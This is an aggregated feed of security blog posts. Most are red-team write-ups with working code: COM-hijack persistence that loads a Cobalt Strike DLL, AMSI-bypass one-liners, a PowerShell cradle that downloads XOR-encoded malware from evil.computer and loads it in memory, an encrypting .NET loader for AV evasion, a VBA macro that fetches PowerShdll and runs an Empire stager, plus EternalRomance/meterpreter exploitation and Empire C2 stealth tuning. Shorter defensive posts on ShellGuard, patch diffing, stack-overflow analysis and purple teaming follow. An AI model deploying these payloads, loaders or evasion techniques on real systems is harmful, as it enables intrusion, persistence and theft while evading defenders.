The next block in main.tf defines a Proxmox QEMU VM resource "proxmox_vm_qemu" {} or resource "proxmox_lxc" {}. Probably the most interesting part here it that my Terraform configuration supports the creation of multiple resources at once, by defining the hostnames and IP addresses respectively in var.tf:

variable "hostnames" {
  description = "Virtual machines to be created"
  type        = list(string)
  default     = ["prod-vm", "staging-vm", "dev-vm"]
}

variable "ips" {
    description = "IPs of the VMs, respective to the hostname order"
    type        = list(string)
	default     = ["10.0.42.83", "10.0.42.84", "10.0.42.85"]
}

In addition, I use Ansible as a provioner after the VM has been created. The host that kicks off the Terraform configuration will also run the Ansible playbook that in my default configuration will update the OS, create a sudo user, secure SSH and upload the SSH public keys you specify in ansible/files/authorized_keys.

I use the Terraform connection block before provisioning to check whether the VM or container initialization is complete. Terraform will retry the connection and only continue executing the configuration when that connection is successful.

  # defines ssh connection to check when the VM is ready for ansible provisioning
  connection {
    host = var.ips[count.index]
    user = var.user
    private_key = file(var.ssh_keys["priv"])
    agent = false
    timeout = "3m"
  } 

  provisioner "remote-exec" {
    inline = [ "echo 'Cool, we are ready for provisioning'"]
  }
  
  provisioner "local-exec" {
    working_dir = "../../ansible/"
    command = "ansible-playbook -u ${var.user} --key-file ${var.ssh_keys["priv"]} -i ${var.ips[count.index]}, provision.yaml"
  }

Cloud-init

The configuration will use a VM template created by cloud-init. There are various guides on how to configure one. Make sure the name of the templates matches clone in main.tf.

Usage

The complete Terraform configuration and Ansible scripts I created are available on Github.

  1. Install Terraform and Ansible on your machine
    • macOS: brew install terraform ansible
    • Ubuntu: apt install ansible and install terraform
  2. git clone https://github.com/vivami/proxmox-automation.git
  3. Define your SSH keys in proxmox-automation/ansible/files/authorized_keys
  4. Go to one of the directories tf/ct/ or tf/vm/ and run terraform init. This will initialize the Terraform configuration and pull in the Proxmox provider. 1

  5. Store your Proxmox password in the environment variable $PM_PASS:
    • set +o history (disable history before storing secrets in variables)
    • export PM_PASS='your_proxmox_pass'
  6. Configure var.tf (e.g. add your own private keys, hostnames/IPs) and main.tf where necessary
  7. Run terraform plan -out plan and if everything seems good terraform apply.
  8. SSH into the box using ssh notroot@<configured_IP> -i ~/.ssh/private_key

To destory to infra created run terraform destroy. 2

Persisting our implant like the CIA

By: vivami
22 February 2019 at 00:00

In March 2017 Wikileaks published the CIA “Vault 7” leaks. Compared to the shadowbrokers NSA leak, this was not an impressive leak and was hardly retooled into red teaming tools. A while back a colleague of mine pointed me to this Vault7 page. Last weekend I found some time to get this technique to work.

I tend to only write about things that I haven’t found published somewhere else, so this blog post only lays out the operational details on getting this technique to work. Please read the Vault7 page first and if you’re interested, more research related to COM hijacking and on Abusing the COM Registry Structure.

Basically this method works by registering a COM CLSID and using that CLSID to point to an (in this case) executable. When Windows encounters this CLSID, it performs a lookup in the registry and executes the corresponding COM object, given the correct properties are set. So called “Junction Folders” are then used to trigger CLSID lookups in Windows.

Configuring peristence

PS C:\> [guid]::newguid()

Guid
----
781a4161-4490-408d-814a-93efe3b100c3

The third command is most interesting because this is where you point the CLSID to your executable on disk, in this case C:\beacon.dll. For this method to work, there are some requirements to be met by this executable (more about that later).


New-Item –Path "HKCU:\Software\Classes\CLSID\" -Name "{781a4161-4490-408d-814a-93efe3b100c3}"

New-Item –Path "HKCU:\Software\Classes\CLSID\{781a4161-4490-408d-814a-93efe3b100c3}"  -Name "InprocServer32"

New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{781a4161-4490-408d-814a-93efe3b100c3}\InprocServer32" -Name "(Default)" -Value "C:\beacon.dll" -PropertyType "String"

New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{781a4161-4490-408d-814a-93efe3b100c3}\InprocServer32" -Name "ThreadingModel" -Value "Apartment" -PropertyType "String"

New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{781a4161-4490-408d-814a-93efe3b100c3}\InprocServer32" -Name "LoadWithoutCOM" -Value "" -PropertyType "String"

New-Item –Path "HKCU:\Software\Classes\CLSID\{781a4161-4490-408d-814a-93efe3b100c3}"  -Name "ShellFolder"

New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{781a4161-4490-408d-814a-93efe3b100c3}\ShellFolder" -Name "HideOnDesktop" -Value "" -PropertyType "String"

New-ItemProperty -Path "HKCU:\Software\Classes\CLSID\{781a4161-4490-408d-814a-93efe3b100c3}\ShellFolder" -Name "Attributes" -Value 0xf090013d -Type DWord

Then you create your junction folder, using this CLSID we just registered. Windows Explorer will help us by hiding the CLSID:

1

2

New-Item -ItemType Directory -Force -Path "C:\Users\superusr\Appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Accessories\Indexing.{781a4161-4490-408d-814a-93efe3b100c3}"

For persistence, this directory should be a directory that Explorer loads when started on boot. CIA recommends using Windows Accessories, but I’m sure there are other directories. The Startup directory could also be used but is obviously more suspicious. Procmon could be of help finding those directories that can be used to persist using Windows Explorer (or others).

DLL structure

I’ve spent some time trying to create a C++ DLL that executes shellcode or a process, but all attempts resulted in explorer.exe crashing. Eventually, I tried a stageless x64 DLL generated by Cobalt Strike containing 64-bit shellcode on a x64 version of Windows 10, which did the job.

3

4

Based on artifact kit’s source code, a VirtualAlloc + VirtualProtect + CreateThread execution with stageless 64-bit shellcode should work, but I still have to figure out the exact constrains set by explorer.exe.

Detection

Yeah, that’s a bit more difficult. Autoruns does not detect this persistency method. @fuseyjz from Countercept created a script that can be used to hunt for this technique by enumerating folders containing a CLISD in ...\Start Menu\ and mapping them against CLSIDs registered in the registry. However, it should be noted that this script only checks HKCU and that explorer.exe is not the only process that can be leveraged to perform a CLSID lookup…

5

Towards generic .NET assembly obfuscation (Pt. 1)

By: vivami
1 September 2018 at 00:00

About 2 years ago when I entered the red teaming field, PowerShell was huge. It was an easy, elegant and clean way to evade anti-malware solutions. But largely due to the efforts from Microsoft to implement defence capabilities such as AMSI and Script Logging into PowerShell (v5), those happy PowerShell days for red teamers are over. Sure, it’s still possible:

[PSObject]Assmebly.GetType('System.Management.Automation'+'Utils'),GetType('amsiIni'+'tFailed', 'nonPublic, static').setValue($null, $true)

or

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

but it’s getting more difficult.

So as often, the red team finds other low hanging fruit with which it’s easier to achieve its goal: .NET.

Efforts in the industry are shifting from PowerShell towards .NET based toolkits, GhostPack, SharpView, SharpWeb and reconerator are examples of those efforts.

Just like with PowerShell modules, it’s often possible to execute those .NET assemblies in memory without touching disk:

$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials
$k="XOR\_KEY";$i=0;[byte[]]$b=([byte[]]($wc.DownloadData("https://evil.computer/malware.exe")))|%{$_-bxor$k[$i++%$k.length]}
[System.Reflection.Assembly]::Load($b) | Out-Null
$parameters=@("arg1", "arg2")
[namespace.Class]::Main($parameters)

or using Cobalt Strike’s 3.11 beacon functionality execute-assembly [1].

Obfuscating .NET binaries

But sometimes it’s inevitable to drop a .NET assembly to disk, or you want to adhere to general good OpSec practices and want to obfuscate your binaries, just in case. I’d be nice to have an obfuscator for .NET assemblies that can obfuscate any .NET assembly, while leaving its functionality intact.

The idea described here is centred around encapsulation of the .NET assembly and loading the encapsulated assembly via the (not logged or monitored) Assembly.Load(byte[]) .NET method at runtime. The output of our obfuscator should be an assembly that loads the original (malicious) assembly into its own process space. Our obfuscator should perform the following steps:

1. Take a .NET assembly as input, obfuscate / encrypt the .NET assembly and encode it to a base64 string:

String path = args[0];
key = getRandomKey();
String filename = Path.GetFileNameWithoutExtension(path).ToString();
String obfuscatedBin = obfuscateBinary(path);

private String obfuscateBinary(String file) {
    byte[] assemblyBytes = fileToByteArray(@file);
    byte[] encryptedAssembly = encrypt(assemblyBytes, key);
    return System.Convert.ToBase64String(encryptedAssembly);
}

2. Create C# code that deobfuscates / decrypts the base64 string and loads the output via Assembly.Load(byte[]):

The srcTemplate variable contains a template for the (outer) assembly output of the obfuscator. Into this template, we copy the obfuscated / encrypted malicious assembly. At runtime, this obfuscated assembly will be deobfuscated and loaded via Assembly.Load(byte[]). The tricky bit here is that after loading the assembly, we don’t know which method in the assembly Main is. We can solve this by matching on its features: public, static and arguments String[]. If it fails, we’ll move on to find the next method with these features. When we’ve found the method that matches these features, we’ll invoke it and pass it the arguments obtained from the “outer” assembly.

public static string srcTemplate = @"using System;
                using System.Collections.Generic;
                using System.IO;
                using System.Reflection;
                using System.Security.Cryptography;

                namespace Loader {
                    public static class Loader {
                    
                        private static readonly byte[] SALT = new byte[] { 0xba, 0xdc, 0x0f, 0xfe, 0xeb, 0xad, 0xbe, 0xfd, 0xea, 0xdb, 0xab, 0xef, 0xac, 0xe8, 0xac, 0xdc };
                        public static void Main(string[] args) {
                            byte[] bytes = decrypt(Convert.FromBase64String(Package.dotnetfile), Package.key);
                            Assembly a = Assembly.Load(bytes);

                            foreach (Type type in a.GetTypes()) {
                                try {
                                    object instance = Activator.CreateInstance(type);
                                    object[] procargs = new object[] { args };
                                    var methodInfo = type.GetMethod(""Main"", BindingFlags.NonPublic | BindingFlags.Public | BindingFlags.Static | BindingFlags.FlattenHierarchy);
                                    var result = methodInfo.Invoke(instance, procargs);
                                }
                                catch (Exception e) { }
                            }
                        }

                        public static byte[] decrypt(byte[] cipher, string key) { // Left out }
                        
                        public class Package {
                            public static string dotnetfile = @""INSERTHERE"";
                            public static string key = @""KEY"";
                        }
                }";
                
String obfuscatedBin = obfuscateBinary(path);
String tmpStr = srcTemplate.Replace("INSERTHERE", obfuscatedBin);
String srcFinal = tmpStr.Replace("KEY", key);

3. Compile a new .NET assembly at runtime:

When the template is filled in, we compile the output assembly:

compile(srcFinal, filename + "_obfuscated.exe");

static void compile(String source, String outfile) {
    var provider_options = new Dictionary<string, string>
    {
        {"CompilerVersion","v3.5"}
    };
    var provider = new Microsoft.CSharp.CSharpCodeProvider(provider_options);
    
    var compiler_params = new System.CodeDom.Compiler.CompilerParameters();
    compiler_params.OutputAssembly = outfile;
    compiler_params.GenerateExecutable = true;

    // Compile
    var results = provider.CompileAssemblyFromSource(compiler_params, source);
    Console.WriteLine("Output file: {0}", outfile);
    Console.WriteLine("Number of Errors: {0}", results.Errors.Count);
    foreach (System.CodeDom.Compiler.CompilerError err in results.Errors) {
        Console.WriteLine("ERROR {0}", err.ErrorText);
    }
}

When implementing this yourself, I encourage you to implement your own obfuscation / encryption routines, as well as some sandbox evasion techniques. While this technique bypasses all traditional AV products, leaving the base64 string as is in the “outer” .NET assembly will trigger some “ML engines”, since the assembly looks at lot like a loader: limited code and a large blob of String. In a following part, I will describe some evasion methods for these “ML engines”.

1

SafetyKatz obfuscation.

2

Piping of arguments to the encapsulated Seatbelt binary.

Phishing between the App Whitelists

By: vivami
8 June 2017 at 22:00

An increasing number of organisations is moving towards virtual desktop environments. They are often easier to administer and maintain, and provide possibilities for additional security layers. One of those security layers more and more encountered at organisations is the RES One Workspace whitelisting solution. While quite a lot was written lately on bypassing AWL (Application Whitelisting), these techniques are aimed towards bypassing Microsofts AppLocker/Device Guard in Windows 10. A reasonably secure configuration of RES One Workspace blocks execution of all of these Microsoft signed binaries (InstallUtil.exe, regsvcs.exe, regasm.exe, regsvr32.exe) used to run code within their context.

1

[Using regasm.exe](https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/) to execute dlls blocked by RES One.

RES One also becomes annoying while phishing with Empire, as the execution of the Empire stagers is prevented by RES One, blocking the execution of powershell.exe entirely for that victim user.

However, either by mistake or for the sake of keeping intact certain Windows functionality, rundll.exe is typically whitelisted by administrators. Depending on the type of pentest, rundll can be used to spawn a Command Prompt, using the ReactOS cmd.dll.

2

Shortcut creation to use cmd.dll via rundll32.exe

Creating the following shortcut to cmd.dll via rundll32.exe yields a pretty functional “Command Prompt”. From there it is oftentimes possible to return to your usual PowerShell environment. Recently, @xP3nt4 created the PowerSdll project which is a more functional alternative to cmd.dll.

3

cmd.dll command prompt running under the rundll32.exe context

The PowerSdll project also provides a bypass for our phishing issue. We can now create a macro that downloads the PowerShdll.dll for the right architecture, and uses the downloaded dll to execute a PowerShell script (in this case an Empire stager) via rundll.

The VBA script below is a PoC I wrote that spawns an Empire agent in a RES One environment. It downloads the proper PowerShdll.dll corresponding to the system’s architecture to the user’s Temp directory and executes the script at https://127.0.0.1/Empire_default_launcher.ps1 (in this case the output of launcher ListenerName.

Sub AutoOpen()
    Debugging
End Sub

Sub Document_Open()
    Debugging
End Sub

Public Function Debugging() As Variant
    DownloadDLL
    Dim Str As String
    Str = "C:\Windows\System32\rundll32.exe " & Environ("TEMP") & "\powershdll.dll,main . { iwr -useb https://127.0.0.1/Empire_default_launcher.ps1 } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    errReturn = objProcess.Create(Str, Null, objConfig, intProcessID)
End Function


Sub DownloadDLL()
    Dim dll_Loc As String
    dll_Loc = Environ("TEMP") & "\powershdll.dll"
    If Not Dir(dll_Loc, vbDirectory) = vbNullString Then
        Exit Sub
    End If
    
    Dim dll_URL As String
    #If Win64 Then
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"
    #Else
        dll_URL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x86/Release/PowerShdll.dll"
    #End If
    
    Dim WinHttpReq As Object
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", dll_URL, False
    WinHttpReq.send

    myURL = WinHttpReq.responseBody
    If WinHttpReq.Status = 200 Then
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile dll_Loc
        oStream.Close
    End If
End Sub

Running an AWL solution?

  • Try to blacklist rundll32.exe
  • Make sure to also include dll's in your AWL. An AWL only checking for executables is not really a (AWL) solution.

Eternalromance: eternal pwnage of Windows Server 2003 and XP

By: vivami
25 April 2017 at 22:00

Most of the write-ups on the leaked Equation Group tools by the shadow brokers are about the Eternalblue exploit, an RCE SMB exploit that provides SYSTEM to the attacker of Windows 7 and Windows Server 2008 machines not patched with MS17–010. Cool stuff, however, maybe even cooler is the stuff that will provide reverse shells for life: Eternalromance on fully patched Windows XP and Server 2003 machines. In this short write-up, I’ll explain how to get EternalRomance working by popping a meterpreter session on a fully patched Windows Server 2003 R2 SP2 box.

win2003

Fully patched Windows Server 2003.

Eternalromance requires shellcode for the exploitation phase. Any shellcode other than shellcode generated by the Doublepulsar implant, results in a BSOD on the box (trust me, I’ve tried this many times…).

Start FuzzBunch and type use Doublepulsar. Walk through the default options and choose function OutputInstall. This generates the shellcode to feed to Eternalromance.

2

Doublepulsar generates dopu_shellcode.bin

Walk through the default options of Eternalromance, let the Smbtouch execute and afterwards provide the dopu_shellcode.bin shellcode file generated with Doublepulsar.

3

Smbtouch via Eternalromance.

4

Select proper DoPu shellcode file.

5

Eternalromance succeeded.

After Eternalromance succeeded, let’s now prepare a payload of use to us, in this case a meterpreter shell.

6

Use msfvenom to generate a meterpreter stager DLL.

Now we’ll let Doublepulsar inject this dll, and initiate a meterpreter session.

7

Doublepulsar injects meterpreter.dll

8

Meterpreter session on the Windows Server 2003 SP2.

shell

Seriously though, if your organisation relies on these legacy operating systems:

  • Disable SMBv1, or;
  • Segment the box
  • Run IDS/IPS with signatures for the maliciously crafted SMBv1 packet.

Stay safe!

Reigning the Empire, evading detection

By: vivami
1 April 2017 at 22:00

tl;dr: Configure a (valid) certificate and add jitter to have Empire communications stay below the radar.

Empire, an open-source post exploitation framework by now well-known among pentesters and red teamers. @harmj0y, @sixdub, and @enigma0x3 did a terrific job making Empire OpSec safe using various obfuscation techniques. On the endpoints, the most prominent and effective one is having most of the PowerShell modules ran in memory. On the network, it appears to be HTTP traffic where its communications are AES encrypted (more here). Empire has been very effective for me, evading pretty much all of the detection mechanisms I had to pass. But recently, it got picked up on the wire by the custom IDS rules of a SOC service provider. As it turned out, I was being a bit sloppy, because Empire can be easily setup to evade these (rather lousy) IDS rules. This is a quick post on what is detected and how to set up Empire to bypass detection.

So, let’s start out by firing up a listener with default values at 192.168.178.162.

Listener_setup_1

Empire listener with default values.

Execute the stager on the victim at 192.168.178.26 and let’s sniff the traffic between attacker and victim.

wireshark_traffic_1

Packet capture of HTTP traffic going to the Empire C2.

Instantly popping up is the large amount of HTTP keep-alive beacons the agent sends back to the C2. This in itself was not the issue, however, the fact that it requests the default Empire pages /admin/get.php, /news.asp, /login/process.jsp was. If we look more closely to the C2 response, we also see that a default “It works!” webpage is returned.

EmpireC2_packet

Empire C2 response viewed in Wireshark. Default "It works!" page is returned.

A user constantly refreshing an “It works!” page doesn’t really looks like the benign behaviour to me… Let’s see if we can obfuscate this a bit. First thing we can do is customise the listeners’ DefaultProfile to, in this case, /feed.xml and index.html.

EmpireC2_listener2

Empire listener with customised DefaultProfile parameter.

This change results in an obvious customisation of the HTTP requests. In my scenario, this alone was enough to evade the IDS.

beacon

Keep-alive beacon using customised profile.

However, the default webpage “It works!” is still there, which is lame.

Now, if we provide the listener with a certificate (you may want to use a valid cert to increase stealthiness) and add random jitter, the communication is wrapped in a TLS layer and Empire specifics are gone!

Excellent. 👌🏼

beacon

Listener set up to use TLS for its communications.

beacon

TLS wrapped communications between the agents and C2.

Shellguard: blocking the execution of shell processes by unknown processes

By: vivami
5 July 2016 at 22:00

Shellguard is a security application implementing the results found during Master thesis research. ShellGuard aims to provide an extra generic layer of security by guarding the execution of a shell process on macOS. My research shows that OS X malware is strongly dependent on a shell process to harm the system. ShellGuard prevents the execution of shells by unknown processes.

ShellGuard consists of a kernel extension (kext) and a userspace client/daemon that communicate through a PF_SYSTEM socket. The kext uses OS X’s TrustedBSD framework to hook the execution system calls to become aware of process executions. Based on the policies defined in the SG_config.json file, ShellGuard allows or denies the execution of shell processes (/bin/sh, /bin/bash, /usr/bin/python etc.).

The ShellGuard daemon/client remains in userspace and runs in privileged mode, which is why I have chosen to write it in Swift, a memory safe language. The daemon parses the ShellGuard policy file (JSON) and passes these rules to the kernel extension.

ShellGuard is available for download on Github.

Engineering antivirus evasion (Part III)

By: plowsec
19 April 2022 at 10:05
Previous blog posts addressed the issue of static artefacts that can easily be caught by security software, such as strings and API imports: This one provides an additional layer of obfuscation to target another kind of detection mechanism used to monitor a program’s activity, i.e userland hooks. As usual, source code was published at https://github.com/scrt/avcleaner … Continue reading Engineering antivirus evasion (Part III)

What does an information risk analyst do? | Cybersecurity Career Series

By: Infosec
18 April 2022 at 07:00

Information risk analysts conduct objective, fact-based risk assessments on existing and new systems and technologies, and communicate findings to all stakeholders within the information system. They also identify opportunities to improve the risk posture of the organization and continuously monitor risk tolerance.

– Free cybersecurity training resources: https://www.infosecinstitute.com/free
– Learn more: https://www.infosecinstitute.com/skills/train-for-your-role/information-risk-analyst/

0:00 - Information risk analyst career
0:30 - Day-to-day tasks of an information risk analyst
2:09 - How to become an information risk analyst
4:00 - Training for an information risk analyst role
5:42 - Skills an information risk analyst needs
9:24 - Tools information risk analysts use
10:51 - Jobs for information risk analysts 
13:08 - Other jobs information risk analysts can do
18:05 - First steps to becoming an information risk analyst

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

Patch diffing CVE-2022–21907

Our security team does an in-depth analysis of critical security vulnerabilities when they are released on patch Tuesday. This patch Tuesday one interesting bug caught our eye. CVE-2022–21907 HTTP Protocol Stack Remote Code Execution Vulnerability, reading through the description words like critical, wormable, etc caught my interest. So we began with a differential analysis of the patch. FYI this story will be updated as I progress with static and dynamic analysis, some assumptions on root cause will most likely be wrong and will be updated as progress is made.

After backing up the December version of http.sys I installed the patch on an analysis machine and performed a differential analysis using IDA pro and BinDiff. There were only a few updated function names in the patched binary.

Only a few changed functions

The updated functions in the binary are UlFastSendHttpResponse with roughly 10% changed across the patch (that's a lot), UlpAllocateFastTracker UlpFastSendCompleteWorker UlpFreeFastTracker and UlAllocateFastTrackerToLookaside. Just reviewing the naming convention of the functions makes me think “use after free” due to the functions handling some sort of allocations, and free’s namely UlpAllocate* and UlpFreeFastTracker. The naming convention makes me think these functions are allocating and freeing chunks of memory.

Without any particular approach to targeting patched functions, let's begin with a review of the basic blocks in UlpFreeFastTracker.

UlpFreeFastTracker Unpatched (on the left) And patched on the right

We can see in UlpFreeFastTracker after returning from a call into UlDestroyLogDataBuffer the unpatched function does nothing before jumping to the next basic block. The patched function on the right ANDs the values in [rbx+0xb0] with 0. Not entirely sure of the reasoning behind that but runtime debugging or further reversing of UlpFreeFastTracker may help.

Another interesting function with a number of changes is UlPAllocateFastTracker. In the patched version, there are a number of changed basic blocks. Changes that stand out are the multiple calls to memset in order to zero out memory. This is one way to squash memory corruption bugs, so our theory is looking good.

memset is added

memset is called again on another basic block before a call to UxDuoIniutializeCollection. UxDuoInitializeCollection is also setting memory to 0 memset at an arbitrary size of 138 bytes. This is unchanged from the previous version so probably not the issue.

additional memset of 0

What is interesting about the first memset in this function is it's an arbitrary size and not a dynamic size. Maybe this is trying to fix something? However, since it's not a dynamic size, maybe there is still space for use after free in other size chunks? or maybe all chunks in this bug are a static size. Just a theory at this point.

memset 0 on 290 byte buffer at rax

Proceeding to the function with the most changes UlFastSendHttpResponse this function is by far more complex than the others. I miss those patch diffing examples with 3 lines of assembly code.

Looking at all of the changes in UlFastSendHttpResponse was a little complex and I’m still trying to understand what it does. However, we can see that the code from UlFastSendHttpResponse does reach UlpFreeFastTracker

There is a call to UlpFreeFastTracker from UlfastSendHttpResponse

Further analysis reveals that there is also a call into UlpAllocateFastTracker.

Direct path into UlpAllocateFastTracker

At this point, a safe assumption may be that the vulnerable code path is hit first in UlFastSendHttpResponse and some of the fixup / mitigations were applied to memory chunks in the other functions. We need to know how to reach the UlFastSendHttpResponse. The only insight that Microsoft gives us is that registry-based mitigations will disable trailer support.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HTTP\Parameters

The enableTrailerSupport registry key should be set to 0 to mitigate the risk, or in our case, it should be enabled and we can check code paths that are hit when we make web requests that include a trailer parameter.

Trailers are defined in RFC7230, more details here

Update as of 1/13/22

The next step would be to make requests that include the trailer parameter and record code paths/code coverage and see if it's possible to get close to the patched code with relative ease. For those that are following along the approach, I plan to take is to fuzz HTTP requests with chunked transfer encoding. I’ll post the results back here but an example to use to start building a corpus would look like this

In the meantime, another researcher on attackerkb shared the text of a kernel bugcheck after a crash. The bugcheck states that a stack overflow was potentially detected in UlFreeUnknownCodingList. Below is the path that the patched function UlFastSendHTTPResponse can take to reach UlFreeUnknownCodingList via UlpFreeHttpRequest. It seems as if we are on the right path.

This looks promising

Update 1/19/22

I had some issues with my target VM patching itself (thanks Microsoft) I’ve reinstalled a fresh windows 10 install and I’m currently fuzzing HTTP chunked requests with Radamsa. I’ll post the sample here when I trigger a crash.

Update 1/20/22

There’s been some confusion lately, a few other researchers have posted exploits related to CVE-2021–31666 and not affecting patched (December) versions of Windows 10 21H2 and 1809 at least. I haven’t seen a single exploit that targets the Transfer-Encoding & chunked requests as specified in the CVE. However, it does appear that those call stacks and bugs are closely related in the code of http.sys. The close-in-nature relation may be the cause of the confusion. I’d recommend reading https://www.zerodayinitiative.com/blog/2021/5/17/cve-2021-31166-a-wormable-code-execution-bug-in-httpsys for details on that bug. It’s also possible to validate that this bug is different due to the fact that the December vs January patch of http.sys does not include any changes to the vulnerable code path in cve-2021–3166. For cve-2021–3166 affected functions are UlAcceptEncodingHeaderHandler, UlpParseAcceptEncoding, and UlpParseContentCoding respectively.

Root cause analysis on unusual stack writing functions with IDA.

A common problem when doing vulnerability research and exploit development is identifying interesting components within binary code. Static analysis is an effective way to identify interesting functions to target. This approach can be quite involved if the binary is lacking symbols, or if source code is not available. However, even in some instances source code or symbols not being available won't hinder your research entirely.

In this example, we’ve identified an application we want to target for pre-auth vulnerabilities. When we attempt to log in with a username but no password we receive the error “Password is missing”

Nope, it's not that easy

Within IDA Pro we can use the search capability to find references to the string “password is missing.” The first result in sub_426b20 is a good candidate.

This looks promising

Navigating to that function and doing a bit of brief analysis on the basic blocks helps us determine that it is an interesting part of an HTTP server that handles authentication.

Main basic block for this function

Once we’ve identified our target functions we can set a breakpoint on the first basic block and attach to the process using one of IDA’s built-in debuggers. After making a request to the login function we can see that our breakpoint has been hit and the webserver is paused. This is promising because it means our code path is correct.

Enabling function tracing after our breakpoint is hit.

After hitting a breakpoint we can enable a function trace, this will record all functions our binary is calling when we continue the debugger. After attempting and failing login we can see only a few functions are hit, and our sub_46B20 is in the list. Great!

Only a few functions have been traced, this will save us time

Running through the login function again, this time with a noticeable username of “AAAAAAAAAAAAAAAA” we can see that the username is placed on the stack. Not good from a binary defense perspective.

Also unusual is that there are no typical culprits when auditing for vulnerabilities, i.e. there is no strcpy function being called. However the call to GetField@SCA_ConfigObj is present right before our username appears on the stack.

Further tracing of the execution environment leads us to find the offending instructions in libpal.dll

our offending stack writing gadget

The code in libpal.dll does the following:

  • copy {ecx} to eax register (one byte copy)
  • Increment the ecx register (iterating over our input bytes)
  • move eax into [edx] (this is our destination (the stack))
  • test al,al will continue until a null byte is tested.

What is interesting about that behavior is that it is essentially identical to strcpy without being initially detectable as a strcpy function. Hence initial scans for banned functions wouldn’t have detected the issue.

We’ll find strcpy anyway, deal with it

In summary we’ve done root cause analysis on why a particular called function writes to the stack and allows for a stack based buffer overflow when it’s not immediately apparent that a buffer overflow should happen.

The Seven Habits of Highly Effective Purple Teams

As we are approaching the new year I've been thinking about the milestones and achievements that I’ve been able to accomplish both personally and professionally. 2021 was a year of many challenges and many opportunities. Usually, when I am going through a particularly challenging period I look for a resource that can help to remind me of what it’s like to live a life according to the principles that I value. One such book is The 7 Habits of Highly Effective people and another is Nonviolent Communication. Each one has its own strengths and applications. In this article, I’ll focus on how the 7 habits can map quite well to building and running effective Purple teams.

Habit 1: Be Proactive with Security Testing:

In the cybersecurity space, there are a lot of happenings that are outside of your team's control. What you do have control over is how you test the security tools and controls that you do have at your disposal. In Habit 1, instead of saying “I can’t detect APTs because I don’t have a multi-million dollar security stack defending everything in my environment.” Instead, we start with, a question like “What known or documented TTP can we test in our environment?” and theorize on what we may see, or what we may miss. Finally, in Habit 1, we are focusing on proactively identifying visibility gaps before a serious incident happens, and working collaboratively with other teams to address those gaps where appropriate.

Habit 2: “Begin with the end state of your security operations team in mind”

With respect to Habit 2, it’s important for all members of your Purple team to have in their mind a vision of what they want the team's capabilities to look like in the future, both individually and collectively. Each individual can think about what you can do to get closer to that final state one year, quarter, or month at a time. Personally, and for the Purple team at Code42, Habit 2 is also an important area to consider the values of your team and the individuals. Habit 2 goes beyond just “stopping the bad hackers” and asks you to reflect on how you want your own actions and the actions of your team to make an impact. Personally, I have a lot of respect for organizations that make meaningful contributions to the security community by releasing frameworks or powerful tools which contribute to making security better for many organizations. Another useful thought exercise with respect to this habit is taking time for self-reflection and asking if what you are doing now, and what you are working towards is something you will be proud of based only on your personal values and not what society deems as “valuable”.

Habit 3: Put critical incidents first

Habit 3 is one that I struggle with in some manner, the easy thing for me is to do what is important and urgent. The recent log4j issue is a great example. If you have something that is urgent (a new 0 day) it's easy to drop everything else and prioritize that which is urgent and important. However, what I struggle with is dealing with quadrant II activities which are important but not urgent. When I was in high school and college I’d procrastinate on assignments until I had really no other option but to do the assignment. The reality is in those cases those quadrant II activities had moved to quadrant I and then they got done. In some cases, it's impractical for Quadrant II activities to go on unplanned for so long, yes I’ve even completely forgotten a few Quadrant II activities from time to time. On our Purple team, we have a queue of planned test scenarios mapped to the MITRE ATT&CK framework to run through. While this work is important but not urgent, it can be the difference between an adversary being detected and removed from your environment and an adversary persisting in your environment! So planning and executing those quadrant II activities is critical to the long-term success of a Purple team program.

Our workstations in full purple team mode: image credit Bryn Felton-Pitt

Habit 4: Purple thinks win-win!

I think Habit 4 is the epitome of what a Purple team is intended to achieve. The idea behind win-win for a Purple team is of a team that is mutually invested in making the other side better. For instance, the red team finds a new attack method that goes undetected by the blue team. In an effective Purple team, the red team will be excited to share the results of these findings with the blue team. They are motivated by improving the organization's detection and response capabilities. Contrast this with an ineffective team where the red team doesn’t feel a shared goal or common purpose with the blue team. In that case, the Red team may feel incentivized to hoard vulnerabilities and detection bypass techniques without sharing them with the blue team until they’ve been thoroughly abused. This makes improvement take much longer. A contrasting example may be that the blue team has identified a TTP or behavior that gives them reliable detection of the red team's C2 agents. If the blue team feels that their goal is to “catch the red team” they may not want to disclose that known TTP with the red team. Sometimes the win-win mentality is broken unintentionally by artificial incentives. One such example is tying the blue team's financial bonus to detection of red team activities… don’t do that as it puts blue teamers in a position where they may have to sacrifice a financial reward in order to work collaboratively with the red team. I don’t know many people who would do a better job if it meant they lost money.

In summary, the focus of Habit 4 is to create a structure where each blue team and red team member has a shared incentive to see the other team succeed.

Habit 5: Seek first to understand the methods of the other team

